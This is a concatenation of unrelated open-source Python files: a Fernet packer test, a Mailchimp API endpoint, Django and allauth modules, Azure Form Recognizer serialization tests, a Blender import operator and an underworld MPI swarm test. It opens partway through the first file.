packed = b'gAAAAABXJMbdriJ984uMCMKfQ5p2UUNHB1vG43K_uJyzUffbu2Uwy0d71kAnqOKJ7Ww_FEQz9Dliw87UpM'\
b'5TdyoJsll5nMAicg=='
def test_packs_encryptingly(self):
packed = Identity.encrypting_packer.pack({"foo": "bar"})
assert urlsafe_b64decode(packed)[0] == b'\x80' # Fernet version
def test_unpacks_decryptingly(self):
assert Identity.encrypting_packer.unpack(self.packed) == {"foo": "bar"}
def test_fails_to_unpack_old_data_with_a_new_key(self):
encrypting_packer = EncryptingPacker(Fernet.generate_key())
raises(InvalidToken, encrypting_packer.unpack, self.packed)
def test_can_unpack_if_old_key_is_provided(self):
old_key = str(self.client.website.env.crypto_keys)
encrypting_packer = EncryptingPacker(Fernet.generate_key(), old_key)
assert encrypting_packer.unpack(self.packed) == {"foo": "bar"}
def test_leaks_timestamp_derp(self):
# https://github.com/pyca/cryptography/issues/2714
timestamp, = struct.unpack(">Q", urlsafe_b64decode(self.packed)[1:9]) # unencrypted!
assert datetime.datetime.fromtimestamp(timestamp).year == 2016
def test_demands_bytes(self):
raises(TypeError, Identity.encrypting_packer.unpack, buffer('buffer'))
raises(TypeError, Identity.encrypting_packer.unpack, 'unicode')
|
mailchimp3/entities/listsignupforms.py | michaelwalkerfl/python-mailchimp | 311 | 12635848 | # coding=utf-8
"""
The List Signup Forms API endpoint
Documentation: http://developer.mailchimp.com/documentation/mailchimp/reference/lists/signup-forms/
Schema: https://api.mailchimp.com/schema/3.0/Lists/SignupForms/Instance.json
"""
from __future__ import unicode_literals
from mailchimp3.baseapi import BaseApi
class ListSignupForms(BaseApi):
"""
Manage list signup forms.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(ListSignupForms, self).__init__(*args, **kwargs)
self.endpoint = 'lists'
self.list_id = None
def create(self, list_id, data):
"""
Create a customized list signup form.
No fields are listed as required in the documentation and the
description of the method does not indicate any required fields
either.
:param list_id: The unique id for the list.
:type list_id: :py:class:`str`
:param data: The request body parameters
:type data: :py:class:`dict`
"""
self.list_id = list_id
response = self._mc_client._post(url=self._build_path(list_id, 'signup-forms'), data=data)
return response
def all(self, list_id):
"""
Get signup forms for a specific list.
:param list_id: The unique id for the list.
:type list_id: :py:class:`str`
"""
self.list_id = list_id
return self._mc_client._get(url=self._build_path(list_id, 'signup-forms'))
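# Illustrative usage sketch, not part of the upstream module. It assumes the
# standard mailchimp3 client wiring, where this endpoint is exposed as
# `client.lists.signup_forms`; the API key, list id, and request body below are
# placeholders.
#
#   from mailchimp3 import MailChimp
#   client = MailChimp(mc_api='YOUR-API-KEY-us1')
#   forms = client.lists.signup_forms.all(list_id='abc123def4')
#   client.lists.signup_forms.create(list_id='abc123def4',
#                                    data={'header': {'text': 'Join our list'}})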
|
apps/base/models.py | kaustubh-s1/EvalAI | 1,470 | 12635852 | from __future__ import unicode_literals
import logging
from django.db import models
# Get an instance of a logger
logger = logging.getLogger(__name__)
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-managed `created_at` and
`modified_at` fields.
"""
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
app_label = "base"
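# Illustrative usage sketch, not part of the upstream module: concrete models
# pick up `created_at` and `modified_at` simply by subclassing. `Challenge` is
# a made-up example model.
#
#   class Challenge(TimeStampedModel):
#       title = models.CharField(max_length=100)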
def model_field_name(field_name, *args, **kwargs):
"""
    The decorator is used to pass model field names to the create_post_model_field function for logging changes.
"""
def model_field_name_decorator(f, *args, **kwargs):
def model_field_name_wrapper(sender, instance, **kwargs):
f(sender, instance, field_name=field_name, **kwargs)
return model_field_name_wrapper
return model_field_name_decorator
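# Illustrative usage sketch, not part of the upstream module. The decorator is
# intended to wrap a signal receiver so the receiver also gets the tracked
# field name; `SomeModel` and the receiver body below are hypothetical.
#
#   from django.db.models.signals import post_save
#   from django.dispatch import receiver
#
#   @receiver(post_save, sender=SomeModel)
#   @model_field_name(field_name="description")
#   def create_post_model_field(sender, instance, field_name, **kwargs):
#       logger.info("Field %s updated on instance %s", field_name, instance.pk)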
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/vimeo_oauth2/urls.py | vikram0207/django-rest | 6,342 | 12635891 | """URLs for Vimeo OAuth2 Provider"""
from allauth.socialaccount.providers.oauth2.urls import default_urlpatterns
from .provider import VimeoOAuth2Provider
urlpatterns = default_urlpatterns(VimeoOAuth2Provider)
|
sdk/formrecognizer/azure-ai-formrecognizer/tests/test_to_dict_v2.py | vincenttran-msft/azure-sdk-for-python | 2,728 | 12635913 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from datetime import datetime
from azure.ai.formrecognizer import _models
from testcase import FormRecognizerTest
class TestToDict(FormRecognizerTest):
def test_point_to_dict(self):
model = [_models.Point(1, 2), _models.Point(3, 4)]
d = [p.to_dict() for p in model]
final = [
{"x": 1, "y": 2},
{
"x": 3,
"y": 4,
},
]
assert d == final
def test_form_word_to_dict(self):
form_word = _models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = form_word.to_dict()
final = {
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
assert d == final
def test_form_line_to_dict(self):
form_line = _models.FormLine(
text="sample line",
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
words=[
_models.FormWord(
text="sample",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
_models.FormWord(
text="line",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
page_number=2,
appearance=_models.TextAppearance(
style_name="other", style_confidence=0.90
),
)
d = form_line.to_dict()
final = {
"text": "sample line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"words": [
{
"text": "sample",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
{
"text": "line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
],
"page_number": 2,
"kind": "line",
"appearance": {"style_name": "other", "style_confidence": 0.90},
}
assert d == final
def test_form_selection_mark_to_dict(self):
form_selection_mark = _models.FormSelectionMark(
text="checkbox",
state="selected",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = form_selection_mark.to_dict()
final = {
"text": "checkbox",
"state": "selected",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "selectionMark",
}
assert d == final
def test_form_element_to_dict(self):
form_element = _models.FormElement(
kind="selectionMark",
text="element",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = form_element.to_dict()
final = {
"text": "element",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"kind": "selectionMark",
}
assert d == final
def test_text_appearance_to_dict(self):
model = _models.TextAppearance(
style_name="other", style_confidence=0.98
)
d = model.to_dict()
final = {"style_name": "other", "style_confidence": 0.98}
assert d == final
def test_field_data_to_dict(self):
model = _models.FieldData(
text="element",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
)
d = model.to_dict()
final = {
"text": "element",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
}
assert d == final
def test_form_field_to_dict(self):
form_field = _models.FormField(
value_type="phoneNumber",
label_data=_models.FieldData(
text="phone",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
value_data=_models.FieldData(
text="55554444",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
name="phone",
value="55554444",
confidence=0.99,
)
d = form_field.to_dict()
final = {
"value_type": "phoneNumber",
"label_data": {
"text": "phone",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"value_data": {
"text": "55554444",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"name": "phone",
"value": "55554444",
"confidence": 0.99,
}
assert d == final
def test_recognized_form_to_dict(self):
form = _models.RecognizedForm(
form_type="test_form",
form_type_confidence="0.84",
model_id="examplemodel123",
page_range=_models.FormPageRange(1, 1),
fields={
"example": _models.FormField(
value_type="phoneNumber",
label_data=_models.FieldData(
text="phone",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
value_data=_models.FieldData(
text="55554444",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
name="phone",
value="55554444",
confidence=0.99,
)
},
pages=[_models.FormPage(
page_number=1,
text_angle=180.0,
width=5.5,
height=8.0,
unit="pixel",
lines=[_models.FormLine(
text="sample line",
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
words=[
_models.FormWord(
text="sample",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
_models.FormWord(
text="line",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
page_number=2,
appearance=_models.TextAppearance(
style_name="other", style_confidence=0.90
),
)],
)
]
)
d = form.to_dict()
final = {
"form_type": "test_form",
"form_type_confidence": "0.84",
"model_id": "examplemodel123",
"page_range": {"first_page_number": 1, "last_page_number": 1},
"fields": {
"example": {
"value_type": "phoneNumber",
"label_data": {
"text": "phone",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"value_data": {
"text": "55554444",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"name": "phone",
"value": "55554444",
"confidence": 0.99,
}
},
"pages": [{
"page_number": 1,
"text_angle": 180.0,
"width": 5.5,
"height": 8.0,
"unit": "pixel",
"lines": [{
"text": "sample line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"words": [
{
"text": "sample",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
{
"text": "line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
],
"page_number": 2,
"kind": "line",
"appearance": {"style_name": "other", "style_confidence": 0.90},
}],
"selection_marks": [],
"tables": [],
}],
}
assert d == final
def test_form_page_to_dict(self):
form_page = _models.FormPage(
page_number=1,
text_angle=180.0,
width=5.5,
height=8.0,
unit="pixel",
tables= [
_models.FormTable(
page_number=2,
cells=[
_models.FormTableCell(
text="info",
row_index=1,
column_index=3,
row_span=1,
column_span=2,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
confidence=0.87,
is_header=False,
is_footer=True,
page_number=1,
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
]
)
],
row_count=10,
column_count=5,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
lines=[_models.FormLine(
text="sample line",
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
words=[
_models.FormWord(
text="sample",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
_models.FormWord(
text="line",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
page_number=2,
appearance=_models.TextAppearance(
style_name="other", style_confidence=0.90
),
),
],
selection_marks=[_models.FormSelectionMark(
text="checkbox",
state="selected",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
)
d = form_page.to_dict()
final = {
"page_number": 1,
"text_angle": 180.0,
"width": 5.5,
"height": 8.0,
"unit": "pixel",
"tables": [
{"cells": [
{
"text": "info",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"row_index": 1,
"column_index": 3,
"row_span": 1,
"column_span": 2,
"confidence": 0.87,
"is_header": False,
"is_footer": True,
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
},
],
"page_number": 2,
"row_count": 10,
"column_count": 5,
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
},
],
"lines": [{
"text": "sample line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"words": [
{
"text": "sample",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
{
"text": "line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
],
"page_number": 2,
"kind": "line",
"appearance": {"style_name": "other", "style_confidence": 0.90},
}],
"selection_marks": [{
"text": "checkbox",
"state": "selected",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "selectionMark",
}],
}
assert d == final
def test_form_table_cell_to_dict(self):
table_cell = _models.FormTableCell(
text="info",
row_index=1,
column_index=3,
row_span=1,
column_span=2,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
confidence=0.87,
is_header=False,
is_footer=True,
page_number=1,
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
]
)
d = table_cell.to_dict()
final = {
"text": "info",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"row_index": 1,
"column_index": 3,
"row_span": 1,
"column_span": 2,
"confidence": 0.87,
"is_header": False,
"is_footer": True,
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
}
assert d == final
def test_form_table_to_dict(self):
table = _models.FormTable(
page_number=2,
cells=[
_models.FormTableCell(
text="info",
row_index=1,
column_index=3,
row_span=1,
column_span=2,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
confidence=0.87,
is_header=False,
is_footer=True,
page_number=1,
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
]
)
],
row_count=10,
column_count=5,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = table.to_dict()
final = {
"cells": [
{
"text": "info",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"row_index": 1,
"column_index": 3,
"row_span": 1,
"column_span": 2,
"confidence": 0.87,
"is_header": False,
"is_footer": True,
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
},
],
"page_number": 2,
"row_count": 10,
"column_count": 5,
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
}
assert d == final
def test_custom_form_model_properties_to_dict(self):
model = _models.CustomFormModelProperties(
is_composed_model=True,
)
d = model.to_dict()
final = {
"is_composed_model": True,
}
assert d == final
def test_account_properties_to_dict(self):
model = _models.AccountProperties(
custom_model_count=5,
custom_model_limit=10,
)
d = model.to_dict()
final = {
"custom_model_count": 5,
"custom_model_limit": 10,
}
assert d == final
def test_custom_form_model_info_to_dict(self):
model = _models.CustomFormModelInfo(
model_id="1234",
status="creating",
training_started_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
training_completed_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
model_name="sample_model",
properties=_models.CustomFormModelProperties(
is_composed_model=False,
)
)
d = model.to_dict()
final = {
"model_id": "1234",
"status": "creating",
"training_started_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"training_completed_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"model_name": "sample_model",
"properties": {
"is_composed_model": False,
}
}
assert d == final
def test_form_recognizer_error_to_dict(self):
model = _models.FormRecognizerError(
code=404,
message="error not found",
)
d = model.to_dict()
final = {
"code": 404,
"message": "error not found",
}
assert d == final
def test_training_document_info_to_dict(self):
model = _models.TrainingDocumentInfo(
name="sample doc",
status="succeeded",
page_count=3,
errors=[
_models.FormRecognizerError(
code=404,
message="error not found",
)
],
model_id="1234",
)
d = model.to_dict()
final = {
"name": "sample doc",
"status": "succeeded",
"page_count": 3,
"errors": [
{
"code": 404,
"message": "error not found",
}
],
"model_id": "1234",
}
assert d == final
def test_custom_form_model_field_to_dict(self):
model = _models.CustomFormModelField(
label="field_label",
name="field",
accuracy=0.98,
)
d = model.to_dict()
final = {
"label": "field_label",
"name": "field",
"accuracy": 0.98,
}
assert d == final
def test_custom_form_submodel_to_dict(self):
model = _models.CustomFormSubmodel(
model_id="1234",
form_type="submodel",
accuracy=0.98,
fields={
"example": _models.CustomFormModelField(
label="field_label",
name="field",
accuracy=0.98,
)
}
)
d = model.to_dict()
final = {
"model_id": "1234",
"form_type": "submodel",
"accuracy": 0.98,
"fields": {
"example": {
"label": "field_label",
"name": "field",
"accuracy": 0.98,
}
}
}
assert d == final
def test_custom_form_model_to_dict(self):
model = _models.CustomFormModel(
model_id="1234",
status="ready",
training_started_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
training_completed_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
submodels=[
_models.CustomFormSubmodel(
model_id="1234",
form_type="submodel",
accuracy=0.98,
fields={
"example": _models.CustomFormModelField(
label="field_label",
name="field",
accuracy=0.98,
)
}
)
],
errors=[
_models.FormRecognizerError(
code=404,
message="error not found",
)
],
training_documents=[
_models.TrainingDocumentInfo(
name="sample doc",
status="succeeded",
page_count=3,
errors=[
_models.FormRecognizerError(
code=404,
message="error not found",
)
],
model_id="1234",
)
],
model_name="sample model",
properties=_models.CustomFormModelProperties(
is_composed_model=True,
)
)
d = model.to_dict()
final = {
"model_id": "1234",
"status": "ready",
"training_started_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"training_completed_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"submodels": [{
"model_id": "1234",
"form_type": "submodel",
"accuracy": 0.98,
"fields": {
"example":
{
"label": "field_label",
"name": "field",
"accuracy": 0.98,
}
}
}],
"errors": [
{
"code": 404,
"message": "error not found",
}
],
"training_documents": [
{
"name": "sample doc",
"status": "succeeded",
"page_count": 3,
"errors": [
{
"code": 404,
"message": "error not found",
}
],
"model_id": "1234",
}
],
"model_name": "sample model",
"properties": {
"is_composed_model": True,
}
}
assert d == final
|
Validation/HGCalValidation/python/HFNoseDigiClient_cfi.py | ckamtsikis/cmssw | 852 | 12635943 | <reponame>ckamtsikis/cmssw<filename>Validation/HGCalValidation/python/HFNoseDigiClient_cfi.py
import FWCore.ParameterSet.Config as cms
from Validation.HGCalValidation.HGCalDigiClient_cfi import *
hfnoseDigiClient = hgcalDigiClientEE.clone(
DetectorName = cms.string("HGCalHFNoseSensitive"))
|
blender/MapsModelsImporter/operators.py | r23/MapsModelsImporter | 1,401 | 12635948 | # Copyright (c) 2019 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# The Software is provided “as is”, without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the software or the use or other dealings in the
# Software.
#
# This file is part of MapsModelsImporter, a set of addons to import 3D models
# from Maps services
import bpy
from bpy_extras.io_utils import ImportHelper
from bpy.props import StringProperty, IntProperty
from bpy.types import Operator
from .google_maps import importCapture, MapsModelsImportError
from .preferences import getPreferences
class IMP_OP_GoogleMapsCapture(Operator, ImportHelper):
"""Import a capture of a Google Maps frame recorded with RenderDoc"""
bl_idname = "import_rdc.google_maps"
bl_label = "Import Google Maps Capture"
filename_ext = ".rdc"
filter_glob: StringProperty(
default="*.rdc",
options={'HIDDEN'},
maxlen=1024, # Max internal buffer length, longer would be clamped.
)
max_blocks: IntProperty(
name="Max Blocks",
description="Maximum number of draw calls to load",
default=-1,
)
def execute(self, context):
pref = getPreferences(context)
try:
importCapture(context, self.filepath, self.max_blocks, pref)
error = None
except MapsModelsImportError as err:
error = err.args[0]
if error is not None:
self.report({'ERROR'}, error)
return {'FINISHED'}
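# Illustrative invocation sketch, not part of the upstream add-on: once the
# add-on is registered, the operator can also be driven from a script; the
# capture path below is a placeholder.
#
#   bpy.ops.import_rdc.google_maps(filepath="/tmp/capture.rdc", max_blocks=-1)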
def menu_func_import(self, context):
self.layout.operator(IMP_OP_GoogleMapsCapture.bl_idname, text="Google Maps Capture (.rdc)")
def register():
bpy.utils.register_class(IMP_OP_GoogleMapsCapture)
bpy.types.TOPBAR_MT_file_import.append(menu_func_import)
def unregister():
bpy.utils.unregister_class(IMP_OP_GoogleMapsCapture)
bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)
|
opendeep/optimization/loss/__init__.py | vitruvianscience/OpenDeep | 252 | 12635966 | <filename>opendeep/optimization/loss/__init__.py
from __future__ import division, absolute_import, print_function
from opendeep.optimization.loss.loss import *
from opendeep.optimization.loss.binary_crossentropy import *
from opendeep.optimization.loss.categorical_crossentropy import *
from opendeep.optimization.loss.isotropic_gaussian_LL import *
from opendeep.optimization.loss.mse import *
from opendeep.optimization.loss.neg_LL import *
from opendeep.optimization.loss.zero_one import *
from opendeep.optimization.loss import utils
|
docs/test/shadow_particle_test.py | longgangfan/underworld2 | 116 | 12635997 | import h5py
if h5py.get_config().mpi == False:
import warnings
warnings.warn("h5py not MPI enabled. Discontinuing test.")
import sys
sys.exit(0)
import underworld as uw
import numpy as np
mesh = uw.mesh.FeMesh_Cartesian(elementRes=(128,128))
swarm = uw.swarm.Swarm(mesh)
# create some variables to track
origOwningEl = swarm.add_variable('int',1)
origCreatingProc = swarm.add_variable('int',1)
origParticleIndex = swarm.add_variable('int',1)
randomNumber = swarm.add_variable('int',1)
swarm.populate_using_layout(uw.swarm.layouts.PerCellSpaceFillerLayout(swarm,20))
# init variables
origOwningEl.data[:] = mesh.data_elgId[swarm.owningCell.data[:]] # global elementId where created
origCreatingProc.data[:] = uw.mpi.rank # rank where created
origParticleIndex.data[:,0] = range(swarm.particleLocalCount) # local index where created
from random import randint
for index in range(0,swarm.particleLocalCount): # add random numbers to this variable
randomNumber.data[index] = randint(0,9999999)
# get max local particlecount across all procs
from mpi4py import MPI
import numpy as np
comm = MPI.COMM_WORLD
inguy = np.zeros(1)
outguy = np.zeros(1)
inguy[:] = swarm.particleLocalCount
comm.Allreduce(inguy, outguy, op=MPI.MAX)
# create h5 array for players to write primary data into
f = h5py.File('primarydata.hdf5', 'w', driver='mpio', comm=MPI.COMM_WORLD)
dset_data = f.create_dataset('randomdata', (comm.Get_size(),outguy[0]), dtype='i')
# write primary data parallel array
dset_data[uw.mpi.rank,origParticleIndex.data[:,0]] = randomNumber.data[:,0]
# also create one to write particle element counts
